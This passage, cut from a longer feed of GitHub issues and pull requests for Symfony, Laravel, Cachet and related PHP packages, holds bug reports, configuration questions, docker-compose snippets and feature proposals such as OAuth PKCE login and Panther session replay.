However, when doing that, it does not strip the Content-Encoding header of the Response, with the result that the caller has to do some accurate (read: brittle) testing in order to decide if it should trust that Content-Encoding header and do decompression on its own, or not.

This makes it harder than necessary to build middlewares that use the Symfony http Client... (also, for comparison, Guzzle also does automatic decompression of response bodies, and it does strip the Content-Encoding header when doing so)

How to reproduce

I tested this using the Psr18Client wrapper to send http requests via the Symfony Http Client.

Possible Solution

No response

Additional Context

No response

View more
4 comments
gggeek

gggeek

10th Jul 2026 @ 20:30

Summary

  • flare login now defaults to a browser PKCE flow against Passport. --device runs the device-code flow for headless terminals (and is the auto-fallback when stdin is non-interactive). --token preserves the legacy paste-a-PAT UX.
  • Stored OAuth records refresh transparently before each API call via CredentialStore::getAccessToken(). spatie/[email protected]'s new retryOn hook acts as a 401 safety net via CredentialStore::forceRefresh().
  • Per-host credential storage now accepts both legacy strings and OAuth record objects. Existing PAT users keep working until they choose to flare login again — no migration needed.
  • flare logout --all wipes every host in one go.

What landed

  • app/Services/OAuth/: TokenRecord (value object), PkceCodes (RFC 7636 verifier/challenge/state), OAuthEndpoints, OAuthHttpClient, TokenRefresher, LocalCallbackServer (stream_socket_server on 127.0.0.1:0 with inline success/error HTML — PHAR-safe), PkceLoginFlow, DeviceLoginFlow, DeviceAuthorization + DevicePollResult DTOs, OAuthException.
  • config/flare.php: client ID + scopes config. Default client UUID is the dev seed value — see launch blocker below.
  • CredentialStore: extended with getRecord() / setRecord() / getAccessToken() / forceRefresh() / flushAll(), with flock-guarded read-modify-write around refresh.
  • AppServiceProvider: bound the new OAuth services and wired ->auth() to getAccessToken() and ->retryOn() to forceRefresh().
  • LoginCommand refactored: dispatches by mode flag, falls back to device flow on non-interactive stdin, warns when --token replaces an existing OAuth session.
  • 93 Pest tests (+46 new), all passing. PHPStan clean. Pint clean.

:warning: Launch blocker — production OAuth client UUID

config/flare.php ships the dev Flare CLI Passport client UUID (9d000000-0000-4000-8000-000000000001) as the default for FLARE_OAUTH_CLIENT_ID. The production client UUID must be substituted there before tagging a release. The CLI honors the env var at runtime so staging/local can keep overriding via FLARE_OAUTH_CLIENT_ID=… — but the baked-in default is what end users will hit.

Grep for 9d000000 in config/flare.php to spot it. Worth considering a CI grep that fails on a release branch if the placeholder is still present.

Server-side dependencies

  • Passport Flare CLI client must be seeded with loopback redirect URIs (http://127.0.0.1/callback, http://[::1]/callback, flare://oauth/callback) — landed on passport-oauth branch.
  • ApproveAuthorizationController and DenyAuthorizationController must convert Inertia redirects to Inertia::location() (otherwise the XHR can't cross HTTPS → HTTP loopback). Landed on passport-oauth branch.

Test plan

  • OAuth storage shape (mixed with legacy strings) — CredentialStoreTest
  • PKCE flow happy path (state CSRF, code exchange, scope/URL params) — PkceLoginFlowTest
  • Local callback server: real socket, request parsing, success/error HTML — LocalCallbackServerTest
  • Device flow: pending → success, slow_down increases interval, fatal aborts, expiry throws — DeviceLoginFlowTest
  • Token exchange + refresh + refresh-token rotation — OAuthHttpClientTest
  • Proactive refresh threshold — TokenRefresherTest
  • CredentialStore::getAccessToken() refresh + write-back + no-op skip — CredentialStoreTest
  • retryOn(401 → forceRefresh) wiring — OpenApiRegistrationTest
  • LoginCommand: --token, PKCE, non-TTY fallback to device, error paths — LoginCommandTest
  • LogoutCommand: per-host + --allLogoutCommandTest
  • Manual: PKCE end-to-end against passport-oauth.test
  • Manual: proactive refresh (forced expires_at) and retryOn 401 (mangled access_token) against real Passport
  • Manual: --token with both modern (Passport PAT) and legacy SHA-256 tokens
  • Manual: device flow end-to-end (verified at the unit/integration boundary; physical browser approval not yet exercised)
  • Manual: non-TTY auto-fallback to device flow end-to-end (same reason)
View more
AlexVanderbist

AlexVanderbist

22nd May 2026 @ 14:17

documentation

I'm not sure if it should be in the doc in the v3.x installation section or in the composer setup part.

But I think it's worth to mention that the storage directory must be writable by the users that is used by the web server (www-data or similar).

Let me know what you think about so I can transform this in pull request.

View more
1 comment
scips

scips

29th Jan 2025 @ 17:19

View more
1 comment
humblots

humblots

2nd Dec 2025 @ 09:02

Store

Context

src/store/src/Command/ holds four commands. Three of them have a unit test in src/store/tests/Command/; IndexCommand has none.

Command Class Test
ai:store:setup SetupStoreCommand SetupStoreCommandTest (6 tests)
ai:store:drop DropStoreCommand DropStoreCommandTest
ai:store:retrieve RetrieveCommand RetrieveCommandTest (10 tests)
ai:store:index IndexCommand none

grep -rl IndexCommand src/store returns only the class itself. (PR #2305 adds ai:store:clear with a ClearStoreCommandTest, which leaves IndexCommand as the sole gap.)

To be clear about the scope: this is not a hole in the indexing logic. The pipeline underneath the command is well covered — Indexer/SourceIndexerTest, Indexer/ConfiguredSourceIndexerTest, Indexer/DocumentIndexerTest, Document/VectorizerTest, Document/Loader/RssFeedLoaderTest, Document/Transformer/TextSplitTransformerTest, and so on. What is untested is the thin CLI wrapper around it, which is exactly the layer the three sibling tests cover for their commands.

What to cover

src/store/src/Command/IndexCommand.php. Its execute() has real branching:

  1. --source normalisation — the most valuable case. execute() does:
    $sources = $input->getOption('source'); // VALUE_OPTIONAL | VALUE_IS_ARRAY
    $source = match (true) {
        [] === $sources => null,
        1 === \count($sources) => $sources[0],   // collapses to a scalar
        default => $sources,                      // stays an array
    };
    
    Three distinct outcomes — no --sourcenull, one --sourcestring, several → array — all passed to IndexerInterface::index($source). The single-value collapse is the kind of thing that silently changes shape; assert what index() actually receives.
  2. Unknown indexerRuntimeException, The "%s" indexer does not exist.
  3. Indexer of the wrong type — anything that is not a SourceIndexer or a ConfiguredSourceIndexerRuntimeException (... is not a SourceIndexer ...).
  4. index() throws → wrapped in RuntimeException with the original as previous.
  5. Success pathDocuments indexed successfully using "%s" indexer.
  6. configure() — name, description, indexer argument required, source option is an array. The siblings all have a testCommandIsConfigured().
  7. Optionally complete(), which suggests the indexer names from the ServiceLocator.

How

Follow src/store/tests/Command/SetupStoreCommandTest.php — plain TestCase, the command built with a Symfony\Component\DependencyInjection\ServiceLocator of stubbed indexers, driven through Symfony\Component\Console\Tester\CommandTester. Note the exception class is the component's own Symfony\AI\Store\Exception\RuntimeException, not the native one.

New file: src/store/tests/Command/IndexCommandTest.php

cd src/store && vendor/bin/phpunit tests/Command/
cd src/store && vendor/bin/phpstan analyse
vendor/bin/php-cs-fixer fix src/store/   # from the repo root

Tests only — no CHANGELOG.md entry (see AGENTS.md: changelogs list features and deprecations, not test coverage).

Background

Surfaced while reviewing #2300, which adds end-to-end tests to the demo that lean on ai:store:index to build the blog store. Not a blocker for that PR, and independent of it.

View more
chr-hertel

chr-hertel

12th Jul 2026 @ 18:51

help wanted findapr

I tried the example config from the docs to a Laravel/Inertia/Vue app, and it don't work.

If use the code (HandleInertiaRequests.php): 'messages' => flash()->render([], 'array'),

Error: Flasher\Prime\Flasher::render(): Argument #1 ($presenter) must be of type string, array given, called in D:\Laragon6\www\mobi-care\app\Http\Middleware\HandleInertiaRequests.php on line 36

And changing it to: 'messages' => flash()->render('array'), it loads the page, but, I only see the notifications if i press F5, with its not the desired state.

View more
brunonetadmin

brunonetadmin

18th Mar 2025 @ 17:16

Q A
Issues Companion to symfony/ux#3479
License MIT

Companion PR to symfony/ux#3466. Adds the Toolkit/Shadcn docs page for the native-select recipe.

Kept as draft until symfony/ux#3466 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
Amoifr

Amoifr

18th Apr 2026 @ 14:20

Hi there,

I'm struggeling to understand how we should set the values of

MERCURE_JWT_SECRET MERCURE_PUBLISHER_JWT_KEY MERCURE_SUBSCRIBER_JWT_KEY

In the docs for the bundle, MERCURE_JWT_SECRET is used in the examples. In the docs and templates for frankenphp and mercure.rocks, the template uses MERCURE_PUBLISHER_JWT_KEY/..SUBSCRIBER..

Am I understanding correctly that these are two different ways (sync/async) to handle secrets? What is recommended? What are the requirements for the keys/secrets to use? Am I correct that they do not go together?

It seems I cannot find the docs required. Either, they are well hidden or do not exist - which is a pitty because it seems to set the entry barrier higher for this to use.

If you can provide an explanation how "it should be used", I'm more than happy to feed that back into the corresponding docs via MR for future users.

View more
👍 1
xosofox

xosofox

7th Oct 2025 @ 06:34

Summary

Documents the new Route::static() API for Laravel 13.x.

The new section in routing.md covers:

  • basic ->static() usage with shared and browser TTL overrides,
  • default config/cache.php options,
  • response and middleware behavior,
  • when not to use static routes,
  • Inertia behavior,
  • Livewire compatibility,
  • the CDN / Cloudflare Cache Rule caveat.

Related PRs

Compatibility Verification

The framework PR includes app-level matrix verification across PHP 8.4 / 8.5, Inertia 2 / 3, and Livewire 3 / 4 for Laravel 13.x. Inertia 1 is not Laravel 13 compatible.

Testing

Documentation-only change.

View more
DGarbs51

DGarbs51

27th May 2026 @ 03:09

View more
Muhammadinaam

Muhammadinaam

26th Jan 2021 @ 03:22

This will allow the use of IsCsrfTokenValid Attribute but we lose the redirection when the csrk token is not valid. What do you think?

View more
4 comments
seb-jean

seb-jean

21st Feb 2025 @ 15:33

Hi there 👋

I believe this is a fairly common issue, and I’m hoping to find some guidance here, as I couldn’t find anything relevant in the documentation.

In my application, I'm using turbo_stream_listen to establish a connection to a Mercure hub and update the page in real-time when specific events occur. Everything works great so far. The whole stack runs inside Docker Compose using FrankenPHP (and a custom Caddyfile to enable Mercure).

However, I’m running into a problem during deployment:

docker compose up -d --wait --remove-orphans

Deploy

When Docker restarts the containers, the client’s connection to the Mercure server is lost.

In a normal user-driven scenario, this wouldn’t be a big issue — as soon as the user interacts with the app again, a page load or navigation would re-establish the connection seamlessly.

But in my case, the app runs unattended on a tablet in kiosk mode. So after each deployment, the page stays open but no longer receives updates, and I’m forced to ask the client to manually refresh the page, which is not ideal.

I thought about sending a Turbo Stream to trigger a client-side refresh, but of course that doesn’t work — by the time the message is sent, the Mercure connection is already lost.

Is there a recommended way to detect a broken Mercure connection and trigger a page reload or reconnection automatically? Any idea would be greatly appreciated!

Thanks in advance 🙏

View more
1 comment
gremo

gremo

16th May 2025 @ 09:50

Hello, I try to create a new symfony project with enabled "--webapp" option, but get an error while installing.

This is the command: symfony new symfony-64-template --version=lts --webapp

The error is in the cache:clear part of the installation:

Symfony operations: 20 recipes (7a429e6d184854502a7c6c7bf6163efd)
  - Configuring symfony/webapp-pack (>=1.0): From github.com/symfony/recipes:main
  - Configuring doctrine/doctrine-bundle (>=2.10): From github.com/symfony/recipes:main
  -  IGNORING  doctrine/doctrine-bundle (>=2.10): From github.com/symfony/recipes:main
  - Configuring doctrine/doctrine-migrations-bundle (>=3.1): From github.com/symfony/recipes:main
  - Configuring phpunit/phpunit (>=9.6): From github.com/symfony/recipes:main
  - Configuring symfony/debug-bundle (>=5.3): From github.com/symfony/recipes:main
  - Configuring symfony/messenger (>=6.0): From github.com/symfony/recipes:main
  - Configuring symfony/phpunit-bridge (>=6.3): From github.com/symfony/recipes:main
  - Configuring symfony/twig-bundle (>=6.4): From github.com/symfony/recipes:main
  - Configuring symfony/web-profiler-bundle (>=6.1): From github.com/symfony/recipes:main
  - Configuring symfony/validator (>=5.3): From github.com/symfony/recipes:main
  - Configuring symfony/stimulus-bundle (>=2.13): From github.com/symfony/recipes:main
  - Configuring symfony/ux-turbo (>=v2.21.0): From auto-generated recipe
  - Configuring twig/extra-bundle (>=v3.13.0): From auto-generated recipe
  - Configuring symfony/translation (>=6.3): From github.com/symfony/recipes:main
  - Configuring symfony/security-bundle (>=6.4): From github.com/symfony/recipes:main
  - Configuring symfony/notifier (>=5.0): From github.com/symfony/recipes:main
  - Configuring symfony/monolog-bundle (>=3.7): From github.com/symfony/recipes:main
  - Configuring symfony/maker-bundle (>=1.0): From github.com/symfony/recipes:main
  - Configuring symfony/mailer (>=4.3): From github.com/symfony/recipes:main
  - Configuring symfony/asset-mapper (>=6.4): From github.com/symfony/recipes:main
Executing script importmap:require [OK]
Executing script importmap:require [OK]
Executing script importmap:require [OK]
Unpacking Symfony packs
  - Unpacked symfony/webapp-pack
  - Unpacked symfony/orm-pack
  - Unpacked symfony/serializer-pack
  - Unpacked symfony/twig-pack
  - Unpacked symfony/debug-pack
  - Unpacked symfony/profiler-pack
  - Unpacked symfony/test-pack
Loading composer repositories with package information
Pattern "php" listed for update matches platform packages, but these cannot be updated by Composer.
Updating dependencies
Nothing to modify in lock file
Writing lock file
Installing dependencies from lock file (including require-dev)
Package operations: 0 installs, 0 updates, 7 removals
  - Removing symfony/webapp-pack (v1.3.0)
  - Removing symfony/twig-pack (v1.0.1)
  - Removing symfony/test-pack (v1.1.0)
  - Removing symfony/serializer-pack (v1.3.0)
  - Removing symfony/profiler-pack (v1.0.6)
  - Removing symfony/orm-pack (v2.4.1)
  - Removing symfony/debug-pack (v1.0.10)
Generating autoload files
112 packages you are using are looking for funding.
Use the `composer fund` command to find out more!

Symfony operations: 1 recipe (46e521589617cc6dbb7e69e8bab9ecc0)
  - Unconfiguring symfony/webapp-pack (>=1.0): From github.com/symfony/recipes:main
Executing script cache:clear [KO]
 [KO]
Script cache:clear returned with error code 255
!!
!!   // Clearing the cache for the dev environment with debug true
!!
!!  16:02:31 CRITICAL  [php] Uncaught Error: Too few arguments to function PHPStan\PhpDocParser\Parser\ConstExprParser::__construct(), 0 passed in /home/michael/Entwicklung/symfony/symfony-64-template/vendor/symfony/property-info/Extractor/PhpStanExtractor.php on line 71 and exactly 1 expected ["exception" => ArgumentCountError { …}]
!!
!!  In ConstExprParser.php line 18:
!!
!!    Too few arguments to function PHPStan\PhpDocParser\Parser\ConstExprParser::
!!    __construct(), 0 passed in /home/michael/Entwicklung/symfony/symfony-64-tem
!!    plate/vendor/symfony/property-info/Extractor/PhpStanExtractor.php on line 7
!!    1 and exactly 1 expected
!!
!!
!!  cache:clear [--no-warmup] [--no-optional-warmers]
!!
!!
Script @auto-scripts was called via post-update-cmd


  unable to run /usr/bin/composer require webapp --no-interaction

Without the --webapp the installation works, a seperate "composer require webapp" in the folder gives me the same error

My system is Arch Linux with all Updates, Composer version 2.8.2 2024-10-29 16:12:11 PHP version 8.3.13 (/usr/bin/php) Symfony CLI version 5.10.4

Can anybody points me in the right direction.

Thanks in advance.

Michael

View more
👍 1
michaelbaecker

michaelbaecker

12th Nov 2024 @ 16:08

After adding one or more tags to a component, I'm unable to delete all of the tags from the component. I can add, delete, and change tags. However, I can't delete the last tag from the component. I've tried from the Cachet web interface as well as via the Python cachet-client package. I'm running Cachet 2.4.1 on Ubuntu 24.04.1 LTS (x86).

View more
2 comments
gdlxn-ibm

gdlxn-ibm

1st Nov 2024 @ 18:08

Moved from symfony-cli/symfony-cli#331

Symfony 5.4 LTS in theory support PHP7.4 but symfony-cli new --webapp --version=lts or just composer require webapp --no-interaction unable to finish if used on PHP7.4:

 [KO]
Script cache:clear returned with error code 1
!!
!!  In CheckExceptionOnInvalidReferenceBehaviorPass.php line 86:
!!
!!    The service "doctrine.orm.default_annotation_metadata_driver" has a depende
!!    ncy on a non-existent service "doctrine.orm.metadata.annotation_reader".
!!
!!
!!
Script @auto-scripts was called via post-update-cmd

If I'll use php81 composer require webapp --no-interaction it will install but still not working on PHP7.4

View more
1 comment 👍 1
zulus

zulus

29th Jun 2023 @ 12:19

Good morning,

I am currently evaluating the Cachet 2.4 solution to display the status of an information system. I encounter a bug in the dashboard display: When the dashboard has not been accessed for several hours, there is systematically a delay of 2 minutes before it can be displayed. I don't see any errors in the docker logs, I don't understand why this is happening.

The login form is displayed quickly if necessary and it is only after validation of the login that the "blocking" is felt. Once these few minutes have passed, I regain full access to the dashboard.

This is all the more bizarre as the public HMI continues to work perfectly during this period of time.

Here is my configuration:

Docker compose -postgres:12 -redis:latest -postfix (custom container) -stamp:2.4 (custom container) environment: - DB_DRIVER=pgsql - DB_HOST=<postgres_container> - DB_PORT=5432 - DB_DATABASE=<DATABASE> - DB_USERNAME=<DB_USER> - DB_PASSWORD=<DB_PASSWORD> - DB_PREFIX=chq_ - APP_KEY=base64:<MyKey> - APP_LOG=errorlog - APP_ENV=${APP_ENV:-production} - APP_DEBUG=false - DEBUG=false - SESSION_DIVER=redis - CACHE_DRIVER=redis - REDIS_HOST=<redis_container> - MAIL_DRIVER=smtp - MAIL_HOST=<postfix_container> - MAIL_PORT=25 - MAIL_ENCRYPTION=false - PHP_MAX_CHILDREN=20 depends_on: - <postgres_container> - <redis_container> - <postfix_container>

Thanks for your help

View more
Pingoo31

Pingoo31

22nd Sep 2023 @ 14:04

Summary

Concrete design proposal for #198, which reports that generated ManyToOne setters accept null even when the relation is non-nullable (setCategory(?Category $category) for a nullable: false association).

The discussion stalled on a real constraint: the setter must stay nullable for bidirectional relations, because the collection remove*() generated on the inverse side sets the owning side back to null ($item->setOwner(null), orphanRemoval) — making every ManyToOne setter strict would break that generated code.

This PR tightens only the provably-safe subset: a non-nullable, unidirectional ManyToOne, which has no such remove*() null path:

public function setCategory(Category $category): static  // was: ?Category

Bidirectional and explicitly-nullable relations are unchanged. This mirrors what already happens for non-nullable OneToOne setters ($relation->isNullable()), just extended to the ManyToOne case that is provably safe.

Scope / open questions

  • Deliberately setter-only (the original report). The backing property stays ?Category $category = null — consistent with the current OneToOne behavior, and it avoids uninitialized-typed-property pitfalls with Forms.
  • Also making the property non-nullable (raised again recently re: phpstan-doctrine doctrine.associationType) is a bigger discussion — it reopens @javiereguiluz's Forms concern about uninitialized properties — so it's left out here. Happy to follow up if you'd like to go there.

No existing fixtures change (no current test case is non-nullable + unidirectional); a new many_to_one_not_nullable_no_inverse case + fixture covers it.

View more
Amoifr

Amoifr

18th Jun 2026 @ 10:23

Hi,

i have fully working setup, the only part is missing to start panther in --no-headless mode.

symfony app is inside a docker container, my dev environment is in windows wsl2. i can start chrome from my terminal, which opens up a chrome browser. I cannot start chrome inside my container. I can start playwright with ui from a docker container as well. it looks like my dev env is correct.

i am not totally sure my issue, or question is related to panther, so if you think so, just close it down please.

there are already similar issues like: https://github.com/symfony/panther/issues/505

Could somebody write up, or give an example how to run it?

I did setup DISPLAY env variable to: :0 with and without host.docker.internal I did attached volume /tmp/.X11-unix:/tmp/.X11-unix I did run xhost +local:docker I have 1000:1000 uid:gid in my docker container, and wsl2

I asume chrome still cannot reach display:0 from container I did not tried vnc solution I did made work selenium client but did not liked it

So any help would be greate how to run chrome from inside a container, which can connect to desplay on my wsl2.

thanks!

View more
papppeter

papppeter

5th Jun 2024 @ 07:43

The PR is a proposal to allow deserialization of readonly properties.

Motivation

I'm currently handling a project that has integrations with external services. Using the library allows to create objects from the data and encapsulate specific login into it, which is very valuable.

However, the limitation of not being able to deserialize into readonly properties, especially in a context that heavily relies on #[PropertyForMorph] for polymorphic types (like Person in the case of this PR), poses some challenges that readonly properties would cover nicely.

Therefore, I decided to open this PR as I believe there is use cases in which leveraging readonly properties.

View more
agustingomes

agustingomes

28th Jun 2026 @ 21:52

Platform Feature Status: Needs Review
Q A
Bug fix? no
New feature? yes
Docs? no
Issues -
License MIT

This carves out slice 1 of @chr-hertel's endpoint refactor (#2029) as a small, self-contained, backward-compatible PR — the piece that PR explicitly marks as landable on its own:

1. Endpoint as a first-class concept on Model

  • New Endpoint value object (contract identifier + defaults).
  • Model gains getEndpoints(), getDefaultEndpoint(), getEndpoint(string), supportsEndpoint(string).
  • Catalogs declare endpoints via the new AbstractModelCatalog::endpointsForModel() hook.
  • Minimum viable PR: just the new types + the hook, no consumer changes. Backward-compatible; later PRs migrate consumers.

The intent is to let the Endpoint shape land and be iterated on now (it's also what batch routing — #1802 — and multi-contract models like OpenAI chat-completions vs. responses would hang off of), independently of the larger dispatch rework.

What's here

Endpoint — a value object identifying one contract a model speaks, plus optional contract-specific defaults:

namespace Symfony\AI\Platform;

final class Endpoint
{
    public function __construct(private readonly string $contract, private readonly array $defaults = []) { /* … */ }
    public function getContract(): string;
    public function getDefaults(): array;
}

Model — a new optional, last constructor parameter array $endpoints = [], and five accessors:

$model->getEndpoints();         // Endpoint[]
$model->hasEndpoints();         // bool
$model->getDefaultEndpoint();   // ?Endpoint — the first declared
$model->getEndpoint('openai.responses');     // Endpoint, throws if unsupported
$model->supportsEndpoint('openai.responses'); // bool

AbstractModelCatalog — a new endpointsForModel(array $modelConfig): array hook (defaults to []), called in getModel() and forwarded to the Model constructor, so a catalog can declare a model's endpoints by overriding one method.

Backward compatibility

Fully additive:

  • the new Model constructor parameter is optional and last;
  • the catalog hook defaults to no endpoints, so existing catalogs produce identical models;
  • no consumer or bridge is changed — models without endpoints behave exactly as today.

(Bridge Model subclasses with custom constructors — Anthropic\Claude, the OpenAI/Scaleway Embeddings — keep working unchanged; they'll opt into forwarding $endpoints if and when a catalog starts declaring endpoints for them, in a follow-up.)

Tests

EndpointTest (construction, defaults, empty-contract guard), ModelTest (all five accessors incl. default-is-first and the unsupported-contract exception), and AbstractModelCatalogTest (default = no endpoints; the hook populates a model's endpoints). Full Platform suite green; PHPStan and CS-Fixer clean.

The Endpoint API here matches #2029 verbatim so it drops straight into that branch's later slices.

View more
1 comment ❤️ 1
tacman

tacman

24th Jun 2026 @ 16:37

Console Status: Reviewed

Originally, the signal handling documentation used SignalableCommandInterface in the example. This was later changed in #20932 to an example using #[AsEventListener(ConsoleSignalEvent::class)].

However, these two approaches are not equivalent.

SignalableCommandInterface registers signal handlers only for the command that implements the interface, whereas an event listener for ConsoleSignalEvent is registered globally and is triggered for every command.

For example:

#[AsCommand(name: 'app:my-command')]
class MyCommand
{
    // ...

    #[AsEventListener(ConsoleSignalEvent::class)]
    public function handleSignal(ConsoleSignalEvent $event): void
    {
        if (\in_array($event->getHandlingSignal(), [\SIGINT, \SIGTERM], true)) {
            // ...
        }

        // ...
    }
}

Although the listener is defined inside MyCommand, it is not scoped to that command. It will be invoked whenever any console command receives one of the configured signals.

As part of this change, all mentions of SignalableCommandInterface were also removed from the documentation, making it appear as though event listeners are the recommended replacement, even though they serve a different purpose.

This PR tries to create the distinction between per-command signal handlers and global signal handlers.

View more
HypeMC

HypeMC

11th Jul 2026 @ 14:47

Q A
License MIT
Doc issue/PR none

The line can easily be misunderstood in that it would only allow each user access to their profile (while in fact it allows every user access to every profile).

View more
1 comment
ThomasLandauer

ThomasLandauer

21st Apr 2026 @ 20:54

Status: Needs Review DoctrineBridge
Q A
Branch? 6.4
Bug fix? yes
New feature? no
Deprecations? no
Issues Fix #64846
License MIT

Problem

ProxyCacheWarmer::warmUp() collects proxy files via scandir() without filtering by extension. doctrine/orm's ProxyFactory uses an atomic write pattern — it writes to a temp file (Proxy.php.{random_hex}) then renames it to the final .php path:

$tmpFileName = $fileName . '.' . bin2hex(random_bytes(12));
file_put_contents($tmpFileName, $proxyCode);
rename($tmpFileName, $fileName);

If scandir() runs during this window (race with concurrent PHP workers), or if rename() fails silently and the temp file persists, the temp path ends up in the array returned by warmUp().

Since Symfony 7.4, CacheWarmerAggregate strictly validates that every returned path ends in .php, which causes an exception:

"Symfony\Bridge\Doctrine\CacheWarmer\ProxyCacheWarmer::warmUp()" should return a list of files or classes
but "/var/cache/prod/doctrine/orm/Proxies/__CG__SomeEntity.php.2eb37f8174836c6595d337b3" is none of them.

The error is intermittent because in normal conditions the rename() completes before scandir() is called, but fails under concurrent deploys or when rename() silently errors.

Fix

Add a str_ends_with($file, '.php') guard in the scandir() loop:

  foreach (scandir($proxyCacheDir) as $file) {
-     if (!is_dir($file = $proxyCacheDir.'/'.$file)) {
+     if (!is_dir($file = $proxyCacheDir.'/'.$file) && str_ends_with($file, '.php')) {
          $files[] = $file;
      }
  }

This makes the warmer robust against leftover temp files regardless of whether the race occurs or rename() succeeds.

View more
4 comments
semx

semx

9th Jul 2026 @ 12:20

Hey guys,

Adding AssertMapper in merge #13 broke webapp for SF 5.4

Your requirements could not be resolved to an installable set of packages.

  Problem 1
    - Root composer.json requires symfony/asset-mapper 5.4.*, found symfony/asset-mapper[v6.3.0-BETA1, ..., 6.4.x-dev, v7.0.0-BETA1, ..., 7.1.x-dev] but it does not match the constraint.

Use the option --with-all-dependencies (-W) to allow upgrades, downgrades and removals for packages currently locked to specific versions.

To reproduce the problem, install SF 5.4:

composer create-project symfony/skeleton:"^5.4" .
composer require webapp
View more
3 comments
H4wKs

H4wKs

23rd Dec 2023 @ 23:48

Currently, each maker class is declared as final, which prevents extending an existing maker to adapt it to custom needs.

Here: https://symfony.com/bundles/SymfonyMakerBundle/current/index.html#creating-your-own-makers, it is explained that we can create our own makers. However, the problem is that this requires rebuilding everything from scratch every time.

My personal use case is to extend the MakeEntity class (https://github.com/symfony/maker-bundle/blob/1.x/src/Maker/MakeEntity.php) in order to change the default directory. At the moment, when running make:entity, it always looks for or creates entities in the src/Entity directory, whereas in some projects entities are located in different folders, for example src/FolderA/TestEntity.php.

Related issues: https://github.com/symfony/maker-bundle/issues/51 https://github.com/symfony/symfony/issues/28790 https://github.com/symfony/maker-bundle/issues/247

View more
2 comments
sovetski

sovetski

1st Mar 2026 @ 16:06

Essentially, this, I have gotten this after multiple reinstalls:

image

Here's my docker-compose file:

version: "3"
 
services:
  postgres:
    image: postgres:12-alpine
    volumes:
      - /var/lib/postgresql/data
    environment:
      - POSTGRES_USER=postgres
      - POSTGRES_PASSWORD=833d4aa3d852c583
    restart: always
  cachet:
    image: cachethq/docker:latest
    ports:
      - 8787:8000
    links:
      - postgres:postgres
    environment:
      - DB_DRIVER=pgsql
      - DB_HOST=postgres
      - DB_PORT=5432
      - DB_DATABASE=postgres
      - DB_USERNAME=postgres
      - DB_PASSWORD=833d4aa3d852c583
      - DB_PREFIX=chq_
      - APP_KEY=base64:UWLlBazkwP3z9G7a4Qb/Xkx4Q3FNSVhv0ClqBppPggo=
      - APP_LOG=errorlog
      - APP_ENV=${APP_ENV:-production}
      - APP_DEBUG=false
      - DEBUG=false
    depends_on:
      - postgres
    restart: on-failure

View more
2 comments
AIndoria

AIndoria

1st Apr 2022 @ 00:23

help wanted findapr

Description: I am using Flasher 2.0.1 in my Laravel 11 project and would like to know how to properly use the Flasher library in JavaScript. Additionally, I want to ensure that the JavaScript configuration is consistent with the settings defined in the flasher.php configuration file.

Details: Flasher Version: 2.0.1 Laravel Version: 11 Problem: Need guidance on using the Flasher library with JavaScript in a way that mirrors the configuration set in flasher.php.

View more
raseldev99

raseldev99

16th Sep 2024 @ 04:50

Hello,

updated all composer packages today and noticed that the config validation is throwing 210 errors now. Example:

 Config validation failed!   
    
  210 errors found in your application:  
    
  hashing.bcrypt.rounds  Value: 12  
    - hashing.bcrypt.rounds must be an integer.
    
  hashing.argon.memory  Value: 65536  
    - hashing.argon.memory must be an integer.  
    
  hashing.argon.threads  Value: 1  
    - hashing.argon.threads must be an integer.
    
  hashing.argon.time  Value: 4  
    - hashing.argon.time must be an integer.

the first example is bcrypt rounds and I haven't overwritten the rounds in my env. I also have a lot of errors where the value has to be a string, but it already is:

  mail.mailers.mailgun.transport  Value: mailgun  
    - mail.mailers.mailgun.transport must be a string.

It does not fail with version 2.6.0 and also not with 2.5.0. If you need more information just ping me in a reply please.

View more
9 comments
goellner

goellner

30th Apr 2024 @ 07:01

help wanted

NotOrm Package

The goal is to make abstract code based on the package notorm to build a new orm system

View more
ambroisehdn

ambroisehdn

15th Jun 2022 @ 12:34

✏️ Describe the bug The search button on https://spatie.be/docs/laravel-data/v4/introduction does not work anymore.

In console following error

TypeError: undefined is not an object (evaluating '$store.modals.open')

🖥️ Versions Chrome, Firefox, Safari all latest on macOS 15.7

And when you are at it, could Command + K be the shortcut for the current doc page not for some global search?

View more
michaelklopf

michaelklopf

14th Jul 2026 @ 13:32

It would be valuable to implement a feature that allows recording browsing sessions in Chrome, exporting them as a JSON file, and then replaying these sessions with Panther. This feature would simplify the process of converting real user interactions into automated tests.

Motivation
A command or API to load a JSON file of recorded actions (page navigations, clicks, form inputs, etc.) and translate them into Panther commands would help developers quickly generate test cases from actual user sessions. It could reduce the manual effort required to write tests and allow for easier reproduction of issues.

Proposed Implementation

  1. Recording Session in Chrome:
    Allow users to export their Chrome DevTools recorded session as a JSON file with a structure similar to this:

    [
      {
        "type": "navigate",
        "url": "http://example.com"
      },
      {
        "type": "click",
        "selector": "#login-button"
      },
      {
        "type": "fill",
        "selector": "#username",
        "value": "[email protected]"
      }
    ]
    
  2. Replaying the Session in Panther:
    Add a command (e.g., panther:replay-session) or a helper class that reads the JSON file and maps each recorded action to Panther API methods. Below are some code examples demonstrating how this could work:

    Example A: Standalone Script

    <?php
    
    use Symfony\Component\Panther\Client;
    
    // Load JSON session file
    $sessionFile = __DIR__ . '/session.json';
    $actions = json_decode(file_get_contents($sessionFile), true);
    
    // Create a Panther client instance
    $client = Client::createChromeClient();
    
    // Process each action in the recorded session
    foreach ($actions as $action) {
        switch ($action['type']) {
            case 'navigate':
                // Navigate to the given URL
                $client->request('GET', $action['url']);
                break;
            case 'click':
                // Click the element identified by the selector
                $client->getCrawler()->filter($action['selector'])->click();
                break;
            case 'fill':
                // Enter text into the input field identified by the selector
                $client->getCrawler()->filter($action['selector'])->sendKeys($action['value']);
                break;
            default:
                // Optionally log unsupported action types
                echo sprintf("Unsupported action type: %s\n", $action['type']);
                break;
        }
    }
    

    Example B: Symfony Console Command

    <?php
    
    namespace App\Command;
    
    use Symfony\Component\Console\Command\Command;
    use Symfony\Component\Console\Input\InputArgument;
    use Symfony\Component\Console\Input\InputInterface;
    use Symfony\Component\Console\Output\OutputInterface;
    use Symfony\Component\Panther\Client;
    
    /**
     * Command to replay a Chrome recorded session.
     */
    class ReplaySessionCommand extends Command
    {
        protected static $defaultName = 'panther:replay-session';
    
        protected function configure()
        {
            $this
                ->setDescription('Replay a Chrome recorded session from a JSON file.')
                ->addArgument('session', InputArgument::REQUIRED, 'Path to the JSON session file');
        }
    
        protected function execute(InputInterface $input, OutputInterface $output)
        {
            $sessionPath = $input->getArgument('session');
